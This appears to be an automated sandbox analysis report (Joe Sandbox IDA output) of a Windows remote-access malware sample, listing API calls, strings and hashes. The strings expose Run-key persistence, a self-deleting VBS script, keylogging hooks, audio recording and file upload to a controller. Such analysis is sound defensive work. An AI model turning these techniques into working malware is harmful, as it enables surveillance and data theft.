                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                    • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                    • API String ID: 1861856835-3168347843
                                                    • Opcode ID: fd7b13ec8423b1210edccff714628dc6d4d7ad772231e1350d877a7eaf22c577
                                                    • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                    • Opcode Fuzzy Hash: fd7b13ec8423b1210edccff714628dc6d4d7ad772231e1350d877a7eaf22c577
                                                    • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                    Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                    • ExitProcess.KERNEL32 ref: 0040C287
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                    • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                    • API String ID: 3797177996-1998216422
                                                    • Opcode ID: b6d8aa243f822d99f1924028b3c9759b42219f1007b10135fb38ab2539ed0bf1
                                                    • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                    • Opcode Fuzzy Hash: b6d8aa243f822d99f1924028b3c9759b42219f1007b10135fb38ab2539ed0bf1
                                                    • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                    Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                    • SetEvent.KERNEL32 ref: 0041A39A
                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                    • CloseHandle.KERNEL32 ref: 0041A3BB
                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                    • API String ID: 738084811-1408154895
                                                    • Opcode ID: cc17a3b34cd12a070f40af2c584ee673aee5e994bb4b95cc7fd63c6c7d639fab
                                                    • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                    • Opcode Fuzzy Hash: cc17a3b34cd12a070f40af2c584ee673aee5e994bb4b95cc7fd63c6c7d639fab
                                                    • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                    Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                    • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                    • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                    • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Write$Create
                                                    • String ID: RIFF$WAVE$data$fmt
                                                    • API String ID: 1602526932-4212202414
                                                    • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                    • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                    • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                    • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                    Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000001,004068B2,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                    • API String ID: 1646373207-690545036
                                                    • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                    • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                    • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                    • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                    Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 0040BC75
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\eaJOpx.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                    • _wcslen.LIBCMT ref: 0040BD54
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\eaJOpx.exe,00000000,00000000), ref: 0040BDF2
                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                    • _wcslen.LIBCMT ref: 0040BE34
                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                    • ExitProcess.KERNEL32 ref: 0040BED0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                    • String ID: 6$C:\Users\user\AppData\Roaming\eaJOpx.exe$del$open$BG$BG
                                                    • API String ID: 1579085052-1086633802
                                                    • Opcode ID: 931a9aef2d56b535125e3704433d820373bb9d54ed57f9781f46495b19b59438
                                                    • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                    • Opcode Fuzzy Hash: 931a9aef2d56b535125e3704433d820373bb9d54ed57f9781f46495b19b59438
                                                    • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                    Function 00444F4D Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2509303402-3232713500
                                                    • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                    • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                    • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                    • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                    Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                    • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                    • lstrlenW.KERNEL32(?), ref: 0041B217
                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                    • _wcslen.LIBCMT ref: 0041B2EB
                                                    • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                    • GetLastError.KERNEL32 ref: 0041B323
                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                    • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                    • GetLastError.KERNEL32 ref: 0041B380
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                    • String ID: ?
                                                    • API String ID: 3941738427-1684325040
                                                    • Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                    • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                    • Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                    • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                    Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                    • String ID:
                                                    • API String ID: 3899193279-0
                                                    • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                    • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                    • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                    • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                    Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                    • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                    • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                    • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                    • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                    • Sleep.KERNEL32(00000064), ref: 00412060
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                    • String ID: /stext "$HDG$HDG$>G$>G
                                                    • API String ID: 1223786279-3931108886
                                                    • Opcode ID: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                    • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                    • Opcode Fuzzy Hash: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                    • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                    Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                    • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                    • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                    • API String ID: 2490988753-744132762
                                                    • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                    • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                    • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                    • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                    Function 0041B834 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                    • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEnumOpen
                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                    • API String ID: 1332880857-3714951968
                                                    • Opcode ID: 49e9a5a88561ce34b3f4bbc30c580386d809fbe1cc5ec4428c58f77622a0e172
                                                    • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                    • Opcode Fuzzy Hash: 49e9a5a88561ce34b3f4bbc30c580386d809fbe1cc5ec4428c58f77622a0e172
                                                    • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                    Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0040A456
                                                    • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                    • GetForegroundWindow.USER32 ref: 0040A467
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                    • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                    • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                    • API String ID: 911427763-1497357211
                                                    • Opcode ID: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                    • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                    • Opcode Fuzzy Hash: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                    • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                    Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                    • GetCursorPos.USER32(?), ref: 0041CB08
                                                    • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                    • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                    • ExitProcess.KERNEL32 ref: 0041CB84
                                                    • CreatePopupMenu.USER32 ref: 0041CB8A
                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                    • String ID: Close
                                                    • API String ID: 1657328048-3535843008
                                                    • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                    • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                    • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                    • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                    Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                    • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                    • __aulldiv.LIBCMT ref: 00407FE9
                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                    • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                    • API String ID: 1884690901-3066803209
                                                    • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                    • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                    • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                    • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                    Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00001388), ref: 00409E62
                                                      • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                      • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                      • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                      • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
